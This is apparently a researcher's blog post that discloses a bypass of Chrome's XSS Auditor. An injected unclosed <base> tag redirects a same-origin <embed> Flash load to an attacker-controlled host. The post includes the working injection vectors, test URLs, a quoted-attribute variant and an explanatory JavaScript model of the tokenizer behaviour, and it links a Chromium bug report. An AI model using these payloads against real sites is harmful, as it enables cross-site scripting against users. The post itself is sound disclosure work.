Mario discovered this bypass:

XSS Auditor Bypasses 05.2016 https://t.co/c9UcjpDZZM — .mario (@0x6D6172696F) May 17, 2016

Also I found another bypass. In this post, I would like to share my vector.
(Someone asked for a PoC and a test case, so here you are.)
I have filed this bug at https://bugs.chromium.org/p/chromium/issues/detail?id=612672
The vector is this:

<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>

Let's take a look at the process that led to this bypass.
Fetching an external resource with <embed> is blocked:

https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+src=https://evil/>
<embed src=https://evil/>

But fetching a same-origin resource whose URL has no query string is not blocked:

https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+src=/aaa>
<embed src=/aaa>

So, if we can change the base URL, an XSS attack becomes possible.
The base tag is also blocked, but if it is not closed with >, the Auditor does not block it in some cases. The following case is blocked:

https://vulnerabledoma.in/xss_auditortest?test=3&q=<base+href=//evil/
<div><base href=//evil/ </div>

But the following case is not blocked:

https://vulnerabledoma.in/xss_auditortest?test=1&q=<base+href=//evil/
<div><base href=//evil/</div>

Can you see the difference? In the former page there is a whitespace character directly behind the injection point. It seems the Auditor blocks the injection if the page has whitespace directly behind the injection point. In other words, we can inject a base tag without being blocked if the page does not have whitespace directly behind the injection point. A plausible reason: the Auditor compares each tag it tokenizes against the text of the request. With the whitespace, the unquoted href value ends at //evil/, exactly as it appears in the request; without it, the value runs on to the next > and swallows the page's own </div, so the attribute no longer matches the request and is left alone, while the browser still resolves later relative URLs against the attacker's host.
Thus, my vector works!

https://vulnerabledoma.in/xss_auditortest?test=1&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href=//l0.cm/
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>

So, is a bypass impossible whenever the page has whitespace directly behind the injection point? No! We still have a chance.
If a " or ' character exists somewhere below the injection point, we can bypass the Auditor with an unclosed attribute quote, like <base href="//evil/ (the quoted value then swallows everything up to that next quote on the page). It is not blocked in the following condition:

https://vulnerabledoma.in/xss_auditortest?test=4&q=<embed+allowscriptaccess=always+src=/xss.swf><base+href="//l0.cm/
<div>
<embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/
</div><div id="x">AAA</div>
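To make the two unclosed-base cases above concrete, here is an added example (not code from the original post) that mimics the part of the HTML tokenizer that matters, the end of an unquoted or double-quoted href value, and then uses the WHATWG URL parser to show where a same-origin path such as /xss.swf is actually fetched from once the injected <base> is in the document. The sample pages and the hostnames (l0.cm, evil, vulnerabledoma.in) are constructed from the vectors in the post; the helper names are my own. It covers both the unquoted vector with no whitespace behind the injection point and the quoted vector that runs on to the page's next quote.

```javascript
// Added example, not from the original post: how an *unclosed* <base> tag
// still yields a usable base URL for the two vectors described above.
//
// The HTML tokenizer ends an unquoted attribute value at ASCII whitespace
// or '>', and a double-quoted value at the next '"'. The page's own trailing
// markup (</div, a newline, the next <div id=) therefore becomes part of the
// href value. The WHATWG URL parser strips tab/newline characters, and a
// path-absolute reference such as /xss.swf keeps only the base's scheme and
// host, so the junk in the base's path is irrelevant to the attacker.

// Simplified tokenizer for the value of the href attribute on the first
// "<base href=" in `html`. Unquoted: ends at whitespace or '>'.
// Quoted: ends at the matching quote, or at end of input if none follows.
function injectedBaseHref(html) {
  const m = /<base\s+href=/i.exec(html);
  if (!m) return null;
  const i = m.index + m[0].length;
  const quote = html[i];
  if (quote === '"' || quote === "'") {
    const end = html.indexOf(quote, i + 1);
    return end === -1 ? html.slice(i + 1) : html.slice(i + 1, end);
  }
  let j = i;
  while (j < html.length && !/[\t\n\f\r >]/.test(html[j])) j++;
  return html.slice(i, j);
}

// Resolve a relative resource URL the way the browser does once the injected
// <base> is in effect: resolve the (protocol-relative) base against the page
// URL first, then the resource against that base.
function effectiveResourceUrl(pageUrl, html, resource) {
  const href = injectedBaseHref(html);
  const base = href === null ? new URL(pageUrl) : new URL(href, pageUrl);
  return new URL(resource, base).href;
}

// Constructed sample pages modelled on the post's test cases.
const PAGE = 'https://vulnerabledoma.in/xss_auditortest?test=1&q=x';

const SAMPLES = {
  // No whitespace behind the injection point: </div is swallowed into href.
  unquoted_unclosed: '<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>',
  // Whitespace behind the injection point: the value ends cleanly at //evil/.
  unquoted_space: '<div><base href=//evil/ </div>',
  // Quoted variant: the newline and the next <div id= end up inside href.
  quoted_unclosed: '<div>\n<embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/\n</div><div id="x">AAA</div>',
  // Control: no <base> injected, so the same-origin path stays same-origin.
  none: '<div><embed src=/aaa></div>',
};

// Returns, per sample, the href the tokenizer would see and where /xss.swf
// is really loaded from.
function demo() {
  const out = {};
  for (const [name, html] of Object.entries(SAMPLES)) {
    out[name] = {
      href: injectedBaseHref(html),
      resolved: effectiveResourceUrl(PAGE, html, '/xss.swf'),
    };
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

Every injected variant, with or without the swallowed markup, resolves /xss.swf to the attacker's host, which is exactly why the Auditor's "same-origin, no query string" allowance for <embed src=/xss.swf> is not enough on its own.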
I think this bypass is useful because most pages have a " or ' character somewhere below the injection point.

FYI, also
<script src=/xss.js></script><base href=//evil/
is not blocked. But we can't load the external resource that way, because the script load starts before the base URL is set:

https://vulnerabledoma.in/xss_auditortest?test=1&q=%3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
Thus, I used Flash.
That's all. Thanks for reading my post :)